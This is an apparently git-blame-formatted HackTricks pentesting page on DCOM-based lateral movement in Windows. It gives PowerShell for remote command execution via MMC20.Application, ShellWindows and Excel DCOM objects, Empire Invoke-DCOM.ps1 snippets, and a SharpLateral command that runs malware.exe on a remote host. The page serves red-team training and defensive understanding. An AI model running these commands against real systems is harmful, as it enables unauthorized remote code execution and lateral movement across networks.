hacktricks/windows-hardening/lateral-movement/dcom-exec.md

154 lines
9.8 KiB
Markdown
Raw Normal View History

2022-08-13 15:36:34 +00:00
# DCOM Exec
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-08-13 15:36:34 +00:00
2022-09-09 11:57:02 +00:00
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2024-02-07 04:05:50 +00:00
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
2022-12-11 19:30:44 +00:00
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)..
2022-08-13 15:36:34 +00:00
</details>
<figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
2023-09-02 23:48:41 +00:00
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
2022-08-13 15:36:34 +00:00
## MMC20.Application
2024-02-04 16:10:29 +00:00
Distributed Component Object Model (DCOM) objects present an interesting capability for network-based interactions with objects. Microsoft provides comprehensive documentation for both DCOM and Component Object Model (COM), accessible [here for DCOM](https://msdn.microsoft.com/en-us/library/cc226801.aspx) and [here for COM](https://msdn.microsoft.com/en-us/library/windows/desktop/ms694363\(v=vs.85\).aspx). A list of DCOM applications can be retrieved using the PowerShell command:
2022-08-13 15:36:34 +00:00
2024-02-04 16:10:29 +00:00
```bash
Get-CimInstance Win32_DCOMApplication
```
2022-08-13 15:36:34 +00:00
2024-02-04 16:10:29 +00:00
The COM object, [MMC Application Class (MMC20.Application)](https://technet.microsoft.com/en-us/library/cc181199.aspx), enables scripting of MMC snap-in operations. Notably, this object contains a `ExecuteShellCommand` method under `Document.ActiveView`. More information about this method can be found [here](https://msdn.microsoft.com/en-us/library/aa815396\(v=vs.85\).aspx). Check it running:
2022-08-13 15:36:34 +00:00
2024-02-04 16:10:29 +00:00
This feature facilitates the execution of commands over a network through a DCOM application. To interact with DCOM remotely as an admin, PowerShell can be utilized as follows:
2022-08-13 15:36:34 +00:00
```powershell
2024-02-04 16:10:29 +00:00
[activator]::CreateInstance([type]::GetTypeFromProgID("<DCOM_ProgID>", "<IP_Address>"))
2022-08-13 15:36:34 +00:00
```
2024-02-04 16:10:29 +00:00
This command connects to the DCOM application and returns an instance of the COM object. The ExecuteShellCommand method can then be invoked to execute a process on the remote host. The process involves the following steps:
2022-08-13 15:36:34 +00:00
2024-02-04 16:10:29 +00:00
Check methods:
2022-08-13 15:36:34 +00:00
2024-02-04 16:10:29 +00:00
```powershell
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.10.10"))
$com.Document.ActiveView | Get-Member
2022-08-13 15:36:34 +00:00
```
2024-02-04 16:10:29 +00:00
Get RCE:
2022-08-13 15:36:34 +00:00
```powershell
2024-02-04 16:10:29 +00:00
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.10.10"))
$com | Get-Member
2022-08-13 15:36:34 +00:00
2024-02-04 16:10:29 +00:00
# Then just run something like:
2022-08-13 15:36:34 +00:00
2024-02-04 16:10:29 +00:00
ls \\10.10.10.10\c$\Users
```
2022-08-13 15:36:34 +00:00
2024-02-04 16:10:29 +00:00
For more info check [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/)
2022-08-13 15:36:34 +00:00
2024-02-04 16:10:29 +00:00
## ShellWindows & ShellBrowserWindow
2022-08-13 15:36:34 +00:00
2024-02-04 16:10:29 +00:00
The **MMC20.Application** object was identified to lack explicit "LaunchPermissions," defaulting to permissions that permit Administrators access. For further details, a thread can be explored [here](https://twitter.com/tiraniddo/status/817532039771525120), and the usage of [@tiraniddo](https://twitter.com/tiraniddo)s OleView .NET for filtering objects without explicit Launch Permission is recommended.
2022-08-13 15:36:34 +00:00
2024-02-04 16:10:29 +00:00
Two specific objects, `ShellBrowserWindow` and `ShellWindows`, were highlighted due to their lack of explicit Launch Permissions. The absence of a `LaunchPermission` registry entry under `HKCR:\AppID\{guid}` signifies no explicit permissions.
2022-08-13 15:36:34 +00:00
2024-02-04 16:10:29 +00:00
### ShellWindows
For `ShellWindows`, which lacks a ProgID, the .NET methods `Type.GetTypeFromCLSID` and `Activator.CreateInstance` facilitate object instantiation using its AppID. This process leverages OleView .NET to retrieve the CLSID for `ShellWindows`. Once instantiated, interaction is possible through the `WindowsShell.Item` method, leading to method invocation like `Document.Application.ShellExecute`.
2022-08-13 15:36:34 +00:00
2024-02-04 16:10:29 +00:00
Example PowerShell commands were provided to instantiate the object and execute commands remotely:
2022-08-13 15:36:34 +00:00
```powershell
2024-02-04 16:10:29 +00:00
$com = [Type]::GetTypeFromCLSID("<clsid>", "<IP>")
2022-08-13 15:36:34 +00:00
$obj = [System.Activator]::CreateInstance($com)
2024-02-04 16:10:29 +00:00
$item = $obj.Item()
$item.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "c:\windows\system32", $null, 0)
2022-08-13 15:36:34 +00:00
```
2024-02-04 16:10:29 +00:00
### Lateral Movement with Excel DCOM Objects
2022-08-13 15:36:34 +00:00
2024-02-04 16:10:29 +00:00
Lateral movement can be achieved by exploiting DCOM Excel objects. For detailed information, it's advisable to read the discussion on leveraging Excel DDE for lateral movement via DCOM at [Cybereason's blog](https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom).
2022-08-13 15:36:34 +00:00
2024-02-04 16:10:29 +00:00
The Empire project provides a PowerShell script, which demonstrates the utilization of Excel for remote code execution (RCE) by manipulating DCOM objects. Below are snippets from the script available on [Empire's GitHub repository](https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1), showcasing different methods to abuse Excel for RCE:
2022-08-13 15:36:34 +00:00
```powershell
2024-02-04 16:10:29 +00:00
# Detection of Office version
2022-08-13 15:36:34 +00:00
elseif ($Method -Match "DetectOffice") {
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
$Obj = [System.Activator]::CreateInstance($Com)
$isx64 = [boolean]$obj.Application.ProductCode[21]
Write-Host $(If ($isx64) {"Office x64 detected"} Else {"Office x86 detected"})
}
2024-02-04 16:10:29 +00:00
# Registration of an XLL
2022-08-13 15:36:34 +00:00
elseif ($Method -Match "RegisterXLL") {
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
$Obj = [System.Activator]::CreateInstance($Com)
$obj.Application.RegisterXLL("$DllPath")
}
2024-02-04 16:10:29 +00:00
# Execution of a command via Excel DDE
2022-08-13 15:36:34 +00:00
elseif ($Method -Match "ExcelDDE") {
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
$Obj = [System.Activator]::CreateInstance($Com)
$Obj.DisplayAlerts = $false
$Obj.DDEInitiate("cmd", "/c $Command")
}
```
2024-02-04 16:10:29 +00:00
### Automation Tools for Lateral Movement
Two tools are highlighted for automating these techniques:
- **Invoke-DCOM.ps1**: A PowerShell script provided by the Empire project that simplifies the invocation of different methods for executing code on remote machines. This script is accessible at the Empire GitHub repository.
- **SharpLateral**: A tool designed for executing code remotely, which can be used with the command:
```bash
SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
```
## Automatic Tools
2022-08-13 15:36:34 +00:00
* The Powershell script [**Invoke-DCOM.ps1**](https://github.com/EmpireProject/Empire/blob/master/data/module\_source/lateral\_movement/Invoke-DCOM.ps1) allows to easily invoke all the commented ways to execute code in other machines.
* You could also use [**SharpLateral**](https://github.com/mertdas/SharpLateral):
```bash
SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
```
2022-08-13 15:36:34 +00:00
## References
2024-02-04 16:10:29 +00:00
* [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/)
* [https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/)
2022-08-13 15:36:34 +00:00
<figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
2023-09-02 23:48:41 +00:00
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
2022-08-13 15:36:34 +00:00
<details>
2024-01-05 11:06:33 +00:00
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-08-13 15:36:34 +00:00
2024-01-05 11:06:33 +00:00
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
2022-09-09 11:57:02 +00:00
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2024-01-05 11:06:33 +00:00
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-08-13 15:36:34 +00:00
</details>